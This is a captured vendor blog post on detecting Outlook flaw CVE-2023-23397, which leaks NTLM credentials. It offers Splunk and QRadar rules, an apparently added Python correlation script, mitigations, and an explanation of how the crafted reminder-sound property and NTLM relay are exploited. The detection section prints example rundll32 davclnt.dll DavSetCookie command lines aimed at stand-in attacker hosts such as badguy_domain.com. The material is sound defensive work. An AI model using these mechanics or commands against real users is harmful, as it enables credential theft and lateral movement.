Submitted URL: https://cthjm04.na1.hubspotlinks.com/Ctc/GE+113/cThJm04/VXbv1Z8Q37j_W5zYxD91zjDbrW6tdK5Q4Yn1-ZMDyKlX5knJmV3Zsc37CgHF9W911mln1gkW_wW3S...
Effective URL: https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medi...
Submission: On March 20 via manual from US — Scanned from DE
DETECTING MICROSOFT OUTLOOK VULNERABILITY CVE-2023-23397 IN SPLUNK AND IBM QRADAR

Posted by Tamir Oren Bar-Hai and Phil Neray on March 20, 2023

SUMMARY

Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively exploited in targeted attacks against government, transportation, energy, and military sectors in Europe. With a CVSS rating of 9.8 – due to its elevation of privileges and ease of exploitation – it affects all versions of Outlook for Windows and is particularly serious because it steals credentials before the user has even opened a specially crafted email. Attackers can then use the stolen credential to move laterally within the network in order to gather more information and compromise crown-jewel assets. It's also interesting that this attack is a variation of pass-the-hash (PtH), which has been around since the late 90s.

This blog post includes detection rules for Splunk and IBM QRadar, as well as a detailed technical description of the vulnerability and how it can be exploited. If you're currently using the CardinalOps detection posture management platform, these rules are now being delivered to your portals.
As usual, the rules delivered to CardinalOps users are auto-customized to your environment (indexes, naming conventions, etc.). This enables you to quickly review, automatically test, and push them to your SIEM – via its native API – from the CardinalOps platform.

This blog post describes:

* Relevant MITRE techniques for CVE-2023-23397
* Splunk and IBM QRadar detections for CVE-2023-23397
* How CVE-2023-23397 works
* Technical details for CVE-2023-23397
* How to detect CVE-2023-23397
* Other mitigations for CVE-2023-23397

RELEVANT MITRE TECHNIQUES FOR CVE-2023-23397

* Exploitation for Privilege Escalation (T1068)
* Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)
* Forced Authentication (T1187)
* Exploitation for Credential Access (T1212)

Post-Exploitation

* OS Credential Dumping: LSASS Memory (T1003.001)
* Use Alternate Authentication Material (T1550)

DETECTIONS FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

These rules alert when rundll32.exe uses WebDAV to access a public IP address and, in the same time range, an outbound NTLM authentication event is registered with that same public IP address as the destination machine.
SPLUNK DETECTION RULES FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

Process creation (4688) side: rundll32.exe loading davclnt.dll with a DavSetCookie target outside the RFC 1918 ranges.

    index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name=*rundll32.exe* Process_Command_Line=*davclnt.dll*
    | rex field=Process_Command_Line "DavSetCookie \s*(?<IP_Address>\d+\.\d+\.\d+\.\d+)"
    | search (IP_Address!="10.0.0.0/8" AND IP_Address!="192.168.0.0/16" AND IP_Address!="172.16.0.0/12")

Outbound NTLM audit (8001) side: an NTLM authentication to a target server outside the RFC 1918 ranges.

    index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001
    | rex field=target_server "\s*(?<IP_Address>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
    | search (IP_Address!="10.0.0.0/8" AND IP_Address!="192.168.0.0/16" AND IP_Address!="172.16.0.0/12")

SPLUNK CORRELATION SEARCH FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

Both event types are pulled in one base search, the address is extracted from whichever field the event carries, private ranges are dropped, and the two addresses are merged into a single IP field so that an IP seen in both event types (distinct EventCode count greater than 1) raises the alert.

    search (index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001) OR (index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name=*rundll32.exe* Process_Command_Line=*davclnt.dll*)
    | rex field=target_server "\s*(?<IP_Address_1>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
    | rex field=Process_Command_Line "DavSetCookie \s*(?<IP_Address_2>\d+\.\d+\.\d+\.\d+)"
    | search NOT (IP_Address_1="10.0.0.0/8" OR IP_Address_1="192.168.0.0/16" OR IP_Address_1="172.16.0.0/12" OR IP_Address_2="10.0.0.0/8" OR IP_Address_2="192.168.0.0/16" OR IP_Address_2="172.16.0.0/12")
    | fillnull IP_Address_1 IP_Address_2
    | eval IP=case('IP_Address_1'!="0", 'IP_Address_1', 'IP_Address_2'!="0", 'IP_Address_2')
    | stats dc(EventCode) as EventCode_count count by IP
    | where EventCode_count > 1

Note: The time range can be set using the Splunk search console.
IBM QRADAR DETECTION RULE FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

    and when the event(s) were detected by one or more of Microsoft Windows Security Event Log
    and when the event matches EventID (custom) is any of 4688
    and when the event matches ProcessName (custom) is any of rundll32.exe
    and when the event matches Process CommandLine (custom) contains any of davclnt.dll
    and when the event matches Process CommandLine (custom) matches any of expressions ((?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(?:\.(?!$)|$)){4}

HOW CVE-2023-23397 WORKS

On March 14th, 2023, a serious vulnerability affecting Microsoft Outlook was patched by Microsoft. This vulnerability has existed in multiple versions for more than a decade. The affected versions are Outlook for Windows 2013 up to 2019, including the Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but are not tested or supported.

TL;DR – An adversary sending an email with the affected properties will trigger an outbound SMB connection, causing your machine to send out your NTLM hash (your encrypted password along with your username in clear text). This is not to be confused with the NT hash, which is the one used in pass-the-hash (PtH) attacks. The NTLM hash contains an encrypted form of your password, and the adversary has to brute-force this encrypted credential before gaining access to your clear-text password. The time a brute-force attack needs to succeed depends on your password length and complexity (and can range from seconds to years). Of course there are other methods that can speed up the guessing process (e.g., Hashcat permutations), so we need to act quickly to prevent and detect exploitation attempts.

Another approach to exploiting this vulnerability is to relay the NTLM packets to a target server or workstation. Think of an IT admin using an unpatched Outlook version, causing their machine to send out an NTLM packet.
This packet is captured by the adversary and relayed to another machine on the network, say that of the HR or Finance department head (or someone in DevOps). That machine has now accepted the IT admin's credentials for a login. Any command can then be executed by the adversary on behalf of the IT admin. (See also: Getting Creds via NTLMv2, 0xdf hacks stuff.)

Of course, for this to occur the adversary needs to have established a foothold on your network, unless you allow outbound and inbound SMB traffic from the internet (we never allow that, right?).

To summarize, there are two outcomes from the exploitation of this Outlook vulnerability: a possible password compromise and access to remote machines.

TECHNICAL DETAILS FOR CVE-2023-23397

Let's dive into more details:

* The Outlook client automatically parses and executes crafted messages containing attributes that control the MAPI properties used to set the "reminder notification" sound file location.
* The execution is performed silently, without any indication to the end user.
* The crafted message can be a shared Outlook task or a calendar invite type of message.
* The specific MAPI properties are PidLidReminderFileParameter and PidLidReminderOverride.
* Once these properties are set and PidLidReminderFileParameter points to an adversary-controlled machine - this is the culprit, and the reason we are reading this article 🙂.

The processing of the path to the reminder sound file location is mostly triggered by Exchange-based systems (on-prem and cloud). Even Hotmail seems to do the same. Will Dormann on Twitter: "So, all of this wondering about how to send a "rich" calendar invite over SMTP is moot. The actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F (PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA"

Once the Outlook client is able to process the malformed mail item, the outbound SMB packet is sent, without any notification or user interaction.

It seems that even after applying the patch, Microsoft allows the reminder sound file to be loaded by pointing to a hostname. This can be leveraged internally on the network, or can be used to reach a public IP if the hosts file is manipulated.

Another nice "feature" of this vulnerability is the ability to trigger legacy capabilities in Windows that, if not managed, can leak credentials. For example, by using a non-existent host name in the reminder file path, the adversary can cause LLMNR and NBT-NS broadcast and multicast requests. See https://attack.mitre.org/techniques/T1557/001/ for details.

HOW TO DETECT CVE-2023-23397

The process command line on the victim's machine can be identified by the following format:

    rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie [ip address or a domain name] http://[ip address or a domain name]/[path to a file or a directory]

For example:

    rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 35.180.139.74 http://35.180.139.74/file/sound.wav
    rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie badguy http://badguy_domain.com/file/sound.wav

The format can also be shorter:

    rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie http://35.180.139.74/file/sound.wav
    rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie http://badguy_domain.com/file/sound.wav

Even though the command line states the http protocol, the Windows machine will send an SMB packet on port 445.
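The same correlation the Splunk rules describe (a davclnt.dll DavSetCookie command line in event 4688 plus an outbound NTLM audit event 8001 to the same host within one time window), written out as an added Python example. This is not CardinalOps code and not a rule from the post. It assumes events already parsed into dicts with the field names `command_line` (event 4688) and `target_server` (event 8001, the field name the Splunk rule uses), and the sample events are constructed; the IP address and names in them are the ones the post uses as examples. It goes a little beyond the Splunk `rex`: the host is taken out of the URL, so the short command-line form, domain names and the ordinal form are all covered, and the public/non-public decision uses the `ipaddress` module's global-address test instead of the three RFC 1918 ranges.

```python
"""Correlate davclnt.dll (DavSetCookie) command lines with outbound NTLM audit
events. Added example, not the CardinalOps rules. Assumed event shapes:
  {"ts": datetime, "event_id": 4688, "command_line": "..."}   # Security 4688
  {"ts": datetime, "event_id": 8001, "target_server": "..."}  # NTLM audit 8001
"""
import ipaddress
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Both command-line shapes from the post (bare host argument present or absent),
# plus the ordinal form ",#6" the post describes as untested.
DAVCLNT_RE = re.compile(
    r"davclnt\.dll,(?:DavSetCookie|#6)\s+(?:(?P<host>\S+)\s+)?(?P<url>https?://\S+)",
    re.IGNORECASE,
)


def webdav_target(command_line):
    """Host the DavSetCookie call points at, or None for a non-matching command line."""
    m = DAVCLNT_RE.search(command_line)
    if not m:
        return None
    # The URL host is authoritative; the bare host argument is only a fallback.
    return urlsplit(m.group("url")).hostname or m.group("host")


def classify_target(host):
    """Classify a target as public_ip, non_public_ip (RFC 1918, loopback,
    link-local, ...), single_label (no dot: falls back to LLMNR/NBT-NS when
    DNS fails) or fqdn."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "fqdn" if "." in host else "single_label"
    return "public_ip" if addr.is_global else "non_public_ip"


def correlate(events, window=timedelta(minutes=5), allowlist=frozenset()):
    """Alert on hosts seen both as a DavSetCookie target (4688) and as an
    outbound NTLM target (8001) within `window`, skipping non-public IPs and
    allow-listed hosts. Returns a list of {"host", "kind", "first_seen"}."""
    dav_times, ntlm_times = {}, {}
    for ev in events:
        if ev["event_id"] == 4688:
            host, bucket = webdav_target(ev.get("command_line", "")), dav_times
        elif ev["event_id"] == 8001:
            host, bucket = ev.get("target_server", "").lstrip("\\"), ntlm_times
        else:
            continue
        if host and host not in allowlist:
            bucket.setdefault(host, []).append(ev["ts"])

    alerts = []
    for host, dts in dav_times.items():
        kind = classify_target(host)
        if kind == "non_public_ip":
            continue  # internal WebDAV shares are expected traffic
        hits = [(d, n) for d in dts for n in ntlm_times.get(host, [])
                if abs(d - n) <= window]
        if hits:
            alerts.append({"host": host, "kind": kind,
                           "first_seen": min(min(pair) for pair in hits)})
    return alerts


# Constructed sample events (not real telemetry); the IP and names are the
# ones the post uses as examples.
T0 = datetime(2023, 3, 20, 9, 0, 0)
DAV = r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
SAMPLE_EVENTS = [
    # Long form, public IP, NTLM auth two seconds later: alert
    {"ts": T0, "event_id": 4688,
     "command_line": DAV + "35.180.139.74 http://35.180.139.74/file/sound.wav"},
    {"ts": T0 + timedelta(seconds=2), "event_id": 8001, "target_server": "35.180.139.74"},
    # Short form to an internal WebDAV share: private address, no alert
    {"ts": T0 + timedelta(minutes=1), "event_id": 4688,
     "command_line": DAV + "http://10.1.2.3/share/doc.docx"},
    {"ts": T0 + timedelta(minutes=1, seconds=1), "event_id": 8001, "target_server": "10.1.2.3"},
    # Domain name, but the NTLM event is an hour later: outside the window, no alert
    {"ts": T0 + timedelta(minutes=3), "event_id": 4688,
     "command_line": DAV + "http://badguy_domain.com/file/sound.wav"},
    {"ts": T0 + timedelta(hours=1), "event_id": 8001, "target_server": "badguy_domain.com"},
    # Ordinal form with a single-label name (LLMNR/NBT-NS candidate): alert
    {"ts": T0 + timedelta(minutes=4), "event_id": 4688,
     "command_line": r"rundll32 c:\windows\system32\davclnt.dll,#6 badguy http://badguy/share"},
    {"ts": T0 + timedelta(minutes=4, seconds=3), "event_id": 8001, "target_server": "badguy"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints two alerts: the public IP and the single-label name. Single-label names get their own kind because, as noted above, a non-existent host name in the reminder path falls back to LLMNR/NBT-NS resolution and is worth a separate look. The Splunk `rex` only captures an address that directly follows `DavSetCookie`, so taking the host out of the URL is what lets the shorter command-line form match.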
We need to detect when the DavSetCookie function is accessing a public IP address. This can be normal for a home PC but might be questionable for an enterprise machine. This detection can point out public IP addresses your enterprise clients are using and are trustworthy, but anything other than the known good should trigger a deeper investigation.

If we are on the topic of identifying DLL functions, we should also remember to have detections that identify the use of a DLL function by the function's ordinal value. In this case (not tested but typically works), the command could potentially be:

    rundll32 c:\windows\system32\davclnt.dll,#6 35.180.139.74 http://35.180.139.74/share

For more details, see:

* https://research.splunk.com/endpoint/6c135f8d-5e60-454e-80b7-c56eed739833/
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md#atomic-test-11---rundll32-with-ordinal-value
* yara-rulz/Outlook_CVE_2023_23397.yara at main · elceef/yara-rulz (github.com)

Another powerful detection source can be leveraged by enabling "Outbound NTLM traffic to remote servers" in the security options. This enables auditing of outbound NTLM authentication traffic, so you can identify where your desktops and servers are sending their NTLM hashes. Example event log:

* https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-DUR-001_pic2.png
* https://www.windows-security.org/c526612a90004088b250158bc5e7dc2d/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote

OTHER MITIGATIONS FOR CVE-2023-23397

Microsoft suggests blocking outbound port 445 and making use of the Protected Users Active Directory group. This is good advice, except that "Protected Users" is usually not a good fit for the standard user. Test wisely.

We also suggest reviewing your security posture to make sure other vectors are not making it easy for the adversary.

1. Ensure your machines are configured to send out only NTLMv2 and not one of the weaker options.
   Specifically: configure "Send NTLMv2 responses only. Refuse LM & NTLM." For more information see https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
2. The fact that we can trigger any Outlook user to send their NTLM hash to any destination can affect home users (think the C-level or IT admins). Even if the adversary cracks the NTLM hash, the adversary still needs to get lucky and find an interface without MFA. So make sure your home users use MFA for any interface they use from their home PC!
3. To mitigate the NTLM relay attack vector: ensure SMB server signing is enabled on workstations and servers. Configure workstations to block inbound SMB (port 445) and enable exceptions for the specific machines allowed to access the workstation over the network using port 445.

Topics: News, Featured, Threat Management, Security Engineering, MITRE ATT&CK, SecOps, Detection Posture Management